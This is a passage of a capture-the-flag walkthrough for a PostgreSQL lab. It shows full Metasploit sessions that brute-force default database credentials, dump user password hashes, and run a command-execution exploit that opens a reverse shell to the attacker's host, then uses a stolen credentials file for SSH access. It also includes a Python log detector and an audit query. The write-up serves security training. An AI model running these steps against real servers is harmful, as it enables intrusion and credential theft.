Based on E. F. Codd's relational model, an RDBMS allows users to create, update, manage, and interact with a relational database, which stores data in tables.
Relational databases can handle a wide range of data formats and process queries efficiently.
Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database.
RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical for consistent data management.
Metasploit contains a variety of modules that can be used to enumerate multiple RDBMSs, making it easy to gather valuable information.
After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the module (starting with auxiliary)?
Answer: auxiliary/scanner/postgres/postgres_login
Steps to Reproduce: Search for Postgres
What are the credentials you found?
Answer: postgres:password
Steps to Reproduce:
msf6 > use auxiliary/scanner/postgres/postgres_login
msf6 auxiliary(scanner/postgres/postgres_login) > options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                               Required  Description
   ----              ---------------                                                               --------  -----------
   BLANK_PASSWORDS   false                                                                         no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                             yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                     yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                         no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                         no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                         no        Add all users in the current database to the list
   PASSWORD                                                                                        no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                          no        Set to true to see query result sets
   RHOSTS                                                                                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5432                                                                          yes       The target port
   STOP_ON_SUCCESS   false                                                                         yes       Stop guessing when a credential works for a host
   THREADS           1                                                                             yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                        no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                         no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                          yes       Whether to print output for all attempts

msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 10.10.181.37
RHOSTS => 10.10.181.37
msf6 auxiliary(scanner/postgres/postgres_login) > exploit
[-] 10.10.181.37:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)
[+] 10.10.181.37:5432 - Login Successful: postgres:password@template1
[-] 10.10.181.37:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.181.37:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
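From the server's side, a run like the one above leaves a recognisable trail in the PostgreSQL log: one source host failing against several usernames and then succeeding. The following Python is an added detection example (not part of this writeup); the log lines and the log_line_prefix layout they assume are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of PostgreSQL server log lines (not from the writeup),
# assuming log_line_prefix = '%m [%p] %u@%d %h ' and log_connections = on.
# It mirrors the module run above: one source tries several usernames
# (PostgreSQL logs the same FATAL line whether or not the role exists),
# then a login for postgres succeeds.
SAMPLE_LOG = """\
2021-06-16 09:53:58.220 UTC [2202] postgres@template1 10.17.7.91 FATAL:  password authentication failed for user "postgres"
2021-06-16 09:53:58.340 UTC [2203] postgres@template1 10.17.7.91 LOG:  connection authorized: user=postgres database=template1
2021-06-16 09:53:58.470 UTC [2204] scott@template1 10.17.7.91 FATAL:  password authentication failed for user "scott"
2021-06-16 09:53:58.590 UTC [2205] admin@template1 10.17.7.91 FATAL:  password authentication failed for user "admin"
2021-06-16 09:53:58.700 UTC [2206] admin@template1 10.17.7.91 FATAL:  password authentication failed for user "admin"
2021-06-16 10:10:00.000 UTC [2300] app@appdb 10.10.5.20 FATAL:  password authentication failed for user "app"
2021-06-16 10:10:04.000 UTC [2301] app@appdb 10.10.5.20 LOG:  connection authorized: user=app database=appdb
"""

LINE_RE = re.compile(
    r'^\S+ \S+ \S+ \[\d+\] (?P<user>[^@ ]*)@(?P<db>\S+) (?P<host>\S+) '
    r'(?P<level>FATAL|LOG):\s+(?P<msg>.*)$'
)


def analyse(log_text):
    """Per source host: failed-auth count, usernames that failed, and whether
    a connection was authorized after failures had already been seen."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(),
                                 "success_after_failure": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an auth-related line in the assumed prefix format
        entry = stats[m["host"]]
        if m["msg"].startswith("password authentication failed"):
            entry["failures"] += 1
            entry["users"].add(m["user"])
        elif m["msg"].startswith("connection authorized") and entry["failures"]:
            entry["success_after_failure"] = True
    return dict(stats)


def flagged_hosts(log_text, fail_threshold=3, min_users=2):
    """Hosts worth an alert: repeated failures spread over several usernames,
    the signature of a default-credential sweep like the one above."""
    return sorted(host for host, s in analyse(log_text).items()
                  if s["failures"] >= fail_threshold and len(s["users"]) >= min_users)
```

A single application user mistyping its password once (the second host in the sample) stays below the threshold, while the multi-user sweep is flagged.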
What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
Answer: auxiliary/admin/postgres/postgres_sql
Steps to Reproduce: Search for Postgres
Based on the results of #6, what is the RDBMS version installed on the server?
Answer: 9.5.21
Steps to Reproduce:
msf6 > use auxiliary/scanner/postgres/postgres_version
msf6 auxiliary(scanner/postgres/postgres_version) > options

Module options (auxiliary/scanner/postgres/postgres_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

msf6 auxiliary(scanner/postgres/postgres_version) > set RHOSTS 10.10.181.37
RHOSTS => 10.10.181.37
msf6 auxiliary(scanner/postgres/postgres_version) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/postgres/postgres_version) > exploit
[*] 10.10.181.37:5432 Postgres - Version PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
Answer: auxiliary/scanner/postgres/postgres_hashdump
Steps to Reproduce:
msf6 > use auxiliary/scanner/postgres/postgres_hashdump
msf6 auxiliary(scanner/postgres/postgres_hashdump) > options

Module options (auxiliary/scanner/postgres/postgres_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  postgres         yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as

msf6 auxiliary(scanner/postgres/postgres_hashdump) > set RHOSTS 10.10.181.37
RHOSTS => 10.10.181.37
msf6 auxiliary(scanner/postgres/postgres_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/postgres/postgres_hashdump) > exploit
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username   Hash
 --------   ----
 darkstart  md58842b99375db43e9fdf238753623a27d
 poster     md578fb805c7412ae597b399844a54cce0a
 postgres   md532e12f215ba27cb750c9e093ce4b5127
 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
 ti         md57af9ac4c593e9e4f275576e13f935579
 tryhackme  md503aab1165001c8f8ccae31a8824efddc

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           template1        yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          YL9S0cxgNdR      yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 10.10.181.37
RHOSTS => 10.10.181.37
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST tun0
LHOST => 10.17.7.91
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD password
PASSWORD => password
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit
[*] Started reverse TCP handler on 10.17.7.91:4444
[*] 10.10.181.37:5432 - 10.10.181.37:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.181.37:5432 - Exploiting...
[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR dropped successfully
[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR created successfully
[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR copied successfully(valid syntax/command)
[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR dropped successfully(Cleaned)
[*] 10.10.181.37:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.17.7.91:4444 -> 10.10.181.37:52460) at 2021-06-16 15:24:01 +0530

ls -la /home
total 16
drwxr-xr-x  4 root   root   4096 Jul 28  2020 .
drwxr-xr-x 22 root   root   4096 Jul 28  2020 ..
drwxr-xr-x  4 alison alison 4096 Jul 28  2020 alison
drwxr-xr-x  2 dark   dark   4096 Jul 28  2020 dark
ls -la /home/dark
total 28
drwxr-xr-x 2 dark dark 4096 Jul 28  2020 .
drwxr-xr-x 4 root root 4096 Jul 28  2020 ..
-rw------- 1 dark dark   26 Jul 28  2020 .bash_history
-rw-r--r-- 1 dark dark  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31  2015 .bashrc
-rwxrwxrwx 1 dark dark   24 Jul 28  2020 credentials.txt
-rw-r--r-- 1 dark dark  655 May 16  2017 .profile
cat /home/dark/credentials.txt
dark:REDACTED
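Both module runs above rest on two server-side conditions: the hashdump returns md5-scheme verifiers (salted only with the role name), and COPY ... FROM PROGRAM is restricted to superusers, so the shell was obtained because the postgres role is a superuser with a guessable password. The following audit query is an added example, not part of the writeup or of Metasploit; it assumes superuser access, since pg_authid is only readable by superusers.

```sql
-- Added audit query (not from the original writeup). Lists every login role,
-- whether it is a superuser (required for COPY ... FROM PROGRAM on 9.5), and
-- which password scheme its stored verifier uses. Roles reported as 'md5' are
-- exactly what postgres_hashdump returns, and the md5 scheme is
-- md5(password || rolname), so a weak password is cheap to recover offline.
SELECT rolname,
       rolsuper,
       rolcanlogin,
       CASE
         WHEN rolpassword IS NULL                  THEN 'no password'
         WHEN rolpassword LIKE 'md5%'              THEN 'md5 (legacy, salted only with the role name)'
         WHEN rolpassword LIKE 'SCRAM-SHA-256$%'   THEN 'scram-sha-256'
         ELSE 'other'
       END AS password_scheme,
       rolvaliduntil
FROM   pg_authid
WHERE  rolcanlogin
ORDER  BY rolsuper DESC, rolname;

-- Server-wide default for newly set passwords. On 9.5 this is a boolean
-- (md5 on/off); the scram-sha-256 setting exists from PostgreSQL 10 onwards.
SHOW password_encryption;
```

Remediation on this host would be a non-default password for postgres, application roles that are not superusers, and, after upgrading past 9.5, password_encryption = scram-sha-256 with each password reset so the stored verifier changes scheme.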
Dark User
ssh dark@10.10.181.37
dark@10.10.181.37's password:
Last login: Wed Jun 16 03:15:14 2021 from 10.17.7.91
$ ls
credentials.txt
$ whoami
dark
$ cd /home
$ ls
alison  dark
$ cd alison
$ ls
user.txt
$ cat user.txt
cat: user.txt: Permission denied
To read user.txt, we need access as alison.
By searching through the file system, find a configuration file: